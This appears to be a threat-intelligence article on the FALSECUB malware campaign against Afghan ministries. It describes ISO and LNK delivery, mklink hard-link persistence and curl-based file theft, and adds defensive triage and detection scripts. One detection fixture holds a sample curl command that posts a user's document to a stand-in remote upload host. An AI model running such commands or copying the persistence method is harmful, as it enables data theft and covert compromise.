Nomad Leopard Rising: New FALSECUB Malware Targets Afghan Ministries
In recent weeks, staff at Afghan government institutions have been receiving messages that deliver what appear to be official decrees from the Prime Minister's Office. The document is a convincing one, written in Pashto and complete with the national emblem, serial numbers, dates and formal administrative language. Behind this veneer of officialdom is an infection chain built to get the victim to launch the compromise by hand.
Analysts at SEQRITE Labs report that they are tracking a growing campaign aimed at ministries and administrative offices. According to their telemetry, the lure is a government notification containing financial directives and an approaching deadline, a device meant to create urgency so that the recipient opens the document without the caution they would normally apply.
The intrusion begins with an ISO image distributed via a GitHub link, further obscured behind a TinyURL shortener. The file, named Afghanistan Islami Emirates.iso, was first detected on December 23 and appeared on VirusTotal the following day. The attacker's advantage in using an ISO is that Windows mounts it as a virtual drive: historically, files inside a mounted image did not inherit the Mark of the Web, so the download warnings and Protected View restrictions normally applied to internet-sourced files were skipped. Microsoft addressed this in November 2022 (CVE-2022-41091), but on unpatched systems the mark is still lost, and the technique remains a staple of phishing chains.
The image contains three files. The first is the PDF lure, the "official" decree itself. The second is a Windows shortcut (LNK file) that, when opened, displays the PDF to allay suspicion while also launching the next stage. The third is an executable disguised as an ordinary image file, such as img.jpg, so that it looks harmless on casual inspection.
The shortcut runs a command sequence that copies the fake image into C:\ProgramData and then uses mklink to create a hard link to it in the Startup folder under the name searchmgr.exe. Two details matter for responders: mklink is a cmd.exe built-in, so the shortcut necessarily spawns cmd.exe, and a hard link (mklink /H) must live on the same NTFS volume as its target, which is why the copy is staged under C:\ProgramData first. The result is persistence: the malware launches at every subsequent logon while looking like a benign system component. Because both directory entries point at the same file data, deleting the Startup entry alone leaves the executable intact under C:\ProgramData, and vice versa; both must be removed.
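The hard-link persistence described above leaves a concrete artefact: an entry in the Startup folder whose link count is 2 and whose file ID matches a file elsewhere on the volume. The following triage script is an added example written for this article, not code from SEQRITE or from the malware; the temporary directory layout, the names img.jpg and searchmgr.exe in the fixture, and the fake MZ bytes are constructed for illustration, and the real Startup paths are derived from the usual APPDATA and ProgramData environment variables.

```python
import os
import tempfile
from pathlib import Path

# Added example (not code from the SEQRITE report): triage a Startup folder for
# entries that are hard links, the artefact left by "mklink /H" in this campaign.
# Fixture names and contents below are assumptions for illustration only.


def find_hardlinked(startup: Path) -> list[dict]:
    """Return every regular file in `startup` whose link count is above 1.

    A hard link shares its file ID (inode on POSIX, file index on NTFS) with the
    original, so st_nlink on either entry is >= 2. Symlinks are skipped: that is a
    different, privileged mklink mode and a different artefact.
    """
    findings = []
    for entry in sorted(startup.iterdir()):
        if entry.is_symlink() or not entry.is_file():
            continue
        st = entry.stat()
        if st.st_nlink > 1:
            findings.append({"path": entry, "nlink": st.st_nlink, "size": st.st_size,
                             "dev": st.st_dev, "ino": st.st_ino})
    return findings


def locate_siblings(finding: dict, search_root: Path) -> list[Path]:
    """Walk `search_root` and return the other directory entries for the same file.

    Every hard link to a file carries the same (st_dev, st_ino) pair, so matching
    on that pair rather than on name, size or hash is what ties a Startup entry
    such as searchmgr.exe back to a differently named copy under ProgramData.
    """
    siblings = []
    for dirpath, _dirnames, filenames in os.walk(search_root):
        for name in filenames:
            candidate = Path(dirpath) / name
            if candidate == finding["path"] or candidate.is_symlink():
                continue
            try:
                st = candidate.stat()
            except OSError:
                continue
            if (st.st_dev, st.st_ino) == (finding["dev"], finding["ino"]):
                siblings.append(candidate)
    return siblings


def windows_startup_dirs() -> list[Path]:
    """The per-user and all-users Startup folders on a real Windows host."""
    dirs = []
    for var, sub in (("APPDATA", "Microsoft/Windows/Start Menu/Programs/Startup"),
                     ("ProgramData", "Microsoft/Windows/Start Menu/Programs/StartUp")):
        base = os.environ.get(var)
        if base:
            dirs.append(Path(base) / sub)
    return [d for d in dirs if d.is_dir()]


def demo() -> tuple[list[dict], list[Path]]:
    """Build a constructed fixture mimicking the campaign's layout and triage it.

    Layout (illustrative, not indicators from the report):
      <tmp>/ProgramData/img.jpg        staged executable
      <tmp>/Startup/searchmgr.exe      hard link to img.jpg
      <tmp>/Startup/notes.txt          ordinary file, must not be flagged
    """
    root = Path(tempfile.mkdtemp(prefix="startup-triage-"))
    programdata, startup = root / "ProgramData", root / "Startup"
    programdata.mkdir()
    startup.mkdir()
    staged = programdata / "img.jpg"
    staged.write_bytes(b"MZ" + b"\x00" * 62)        # constructed fake PE header
    os.link(staged, startup / "searchmgr.exe")       # equivalent of mklink /H on Windows
    (startup / "notes.txt").write_text("benign\n")
    findings = find_hardlinked(startup)
    siblings = locate_siblings(findings[0], root) if findings else []
    return findings, siblings


if __name__ == "__main__":
    hits, sibs = demo()
    for h in hits:
        print(f"{h['path']}  nlink={h['nlink']}  same file as {[str(s) for s in sibs]}")
    # On a Windows host, also check the real Startup folders.
    for d in windows_startup_dirs():
        for h in find_hardlinked(d):
            print(f"{h['path']}  nlink={h['nlink']}  same file as "
                  f"{[str(s) for s in locate_siblings(h, Path(os.environ['ProgramData']))]}")
```

Matching on (st_dev, st_ino) rather than on file hash is deliberate: it is cheap, it needs no read of the file contents, and it is immune to the attacker renaming the copy. On Windows it corresponds to what `fsutil hardlink list <file>` prints.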
The final payload, which the researchers have named FALSECUB, is written in C++ and carries basic anti-analysis checks. It looks for debuggers and sandbox artefacts and may sleep to wait out automated analysis. Once those checks pass, it connects to a command-and-control (C2) server and waits for instructions.
Its capabilities cover collecting basic system information, including the user name, computer name, Windows version and a list of attached drives, and enumerating the Desktop and Documents folders in particular. Exfiltration is done by building curl commands on the fly (curl.exe has shipped with Windows 10 since version 1803, so nothing extra needs to be dropped). The requests carry custom HTTP headers containing an "access key" and victim identifiers and send files to a remote /upload/ endpoint on a non-standard port. The commands run hidden so that no console window appears, and the malware then attempts to clean up traces of its activity. For defenders, that combination, curl.exe started by an unexpected parent, carrying custom headers and posting file contents to a high port, is a conspicuous pattern in process-creation telemetry.
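The exfiltration pattern above can be turned into a detection over process-creation events (Sysmon Event ID 1 or Security 4688, which record the image, parent and full command line). The script below is an added example for this article, not code from SEQRITE or detection content from the report; the four sample events, including the host name, port, header names, paths and file names, are constructed to show the scoring logic and are not indicators from the campaign.

```python
import re
from urllib.parse import urlparse

# Added example (not from the SEQRITE report): score curl.exe command lines from
# process-creation telemetry for the upload pattern described in the article.
# Every value in SAMPLE_EVENTS is constructed for illustration, not an indicator.

SAMPLE_EVENTS = [
    # 1: FALSECUB-style upload: hidden, custom headers, file post, odd port, /upload/ path
    {"parent": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\searchmgr.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": r'curl.exe -s -X POST -H "X-Access-Key: k3y-EXAMPLE" -H "X-Host: DESKTOP-EXAMPLE\alice" '
            r'-F "file=@C:\Users\alice\Documents\budget.xlsx" http://files.example-dyndns.net:8089/upload/'},
    # 2: an administrator fetching a release over HTTPS
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": r'curl.exe -sSL -o C:\Temp\tool.zip https://github.com/example/tool/releases/latest'},
    # 3: a legitimate API call: auth header, but no file upload and a standard port
    {"parent": r"C:\Program Files\Example\agent.exe",
     "image": r"C:\Program Files\Git\mingw64\bin\curl.exe",
     "cmd": r'curl -H "Authorization: Bearer EXAMPLE" https://api.example.com/v1/status'},
    # 4: not curl at all
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmd": r'notepad.exe C:\Users\alice\upload.txt'},
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
UPLOAD_FLAGS = {"-F", "--form", "-d", "--data", "--data-binary", "--data-raw", "-T", "--upload-file"}
SILENT_FLAGS = {"-s", "--silent"}
STARTUP_MARKER = r"\Start Menu\Programs\StartUp".lower()   # compared case-insensitively


def tokenize(cmd: str) -> list[str]:
    """Split a Windows command line, keeping double-quoted spans as one token."""
    return [t[1:-1] if t.startswith('"') and t.endswith('"') else t
            for t in TOKEN_RE.findall(cmd)]


def parse_curl(cmd: str) -> dict:
    """Extract headers, upload flags, silent flag and target URL from a curl command line."""
    toks = tokenize(cmd)
    info = {"headers": [], "uploads": False, "silent": False, "url": None}
    i = 1                                   # skip the program name
    while i < len(toks):
        t = toks[i]
        if t in ("-H", "--header") and i + 1 < len(toks):
            info["headers"].append(toks[i + 1]); i += 2; continue
        if t in UPLOAD_FLAGS:               # these take a value (the data or file spec)
            info["uploads"] = True; i += 2; continue
        # -s on its own or bundled into a short-option cluster such as -sSL
        if t in SILENT_FLAGS or (t.startswith("-") and not t.startswith("--") and "s" in t[1:]):
            info["silent"] = True
        if t.startswith(("http://", "https://")):
            info["url"] = urlparse(t)
        i += 1
    return info


def score_event(ev: dict) -> dict:
    """Return {'suspicious': bool, 'reasons': [...]} for one process-creation event."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    if image != "curl.exe":
        return {"suspicious": False, "reasons": []}
    info = parse_curl(ev["cmd"])
    reasons = []
    url = info["url"]
    if url is not None:
        port = url.port or (443 if url.scheme == "https" else 80)
        if port not in (80, 443):
            reasons.append("non_standard_port")
        if "/upload" in url.path.lower():
            reasons.append("upload_path")
    if info["uploads"]:
        reasons.append("posts_data")
    if any(h.lower().startswith("x-") for h in info["headers"]):
        reasons.append("custom_x_headers")        # e.g. an "access key" header
    if info["silent"]:
        reasons.append("silent")
    if STARTUP_MARKER in ev["parent"].lower():
        reasons.append("parent_in_startup_folder")
    # Require an actual upload plus at least two more signals: a silent download
    # or a bare API call with a custom header is routine admin activity.
    suspicious = "posts_data" in reasons and len(reasons) >= 3
    return {"suspicious": suspicious, "reasons": reasons}


def flagged(events: list[dict]) -> list[int]:
    """Indices of the events that score as suspicious."""
    return [i for i, e in enumerate(events) if score_event(e)["suspicious"]]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        r = score_event(ev)
        print(f"event {i + 1}: suspicious={r['suspicious']} reasons={r['reasons']}")
```

The threshold is the important design choice: any one of these signals is common in legitimate use, so the rule keys on the file upload and demands corroboration (odd port, /upload path, custom headers, hidden execution, or a parent that itself lives in a Startup folder). Tune the port and path checks to the environment's known upload endpoints before deploying.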
The campaign's infrastructure consists of domains on dynamic DNS providers and several IP addresses, including a Cloudflare node and a separate host with RDP (TCP 3389) exposed. Notably, distribution relied on a fresh GitHub account created on December 23 that was later deleted. Analysis also linked the activity to a cluster of accounts on Scribd, Pinterest and Dailymotion that published genuine Afghan administrative and legal documents, a plausible source for the lure material. Certain indicators, including VirusTotal telemetry for the shortened links, point to Pakistan as a possible origin of the initial uploads.
SEQRITE Labs, which tracks the campaign as Nomad Leopard, assesses it as the work of a regional actor of growing technical maturity. The care taken with the lures and the curated stock of plausible documents suggest that these targeted distributions are likely to continue and may reach beyond Afghanistan.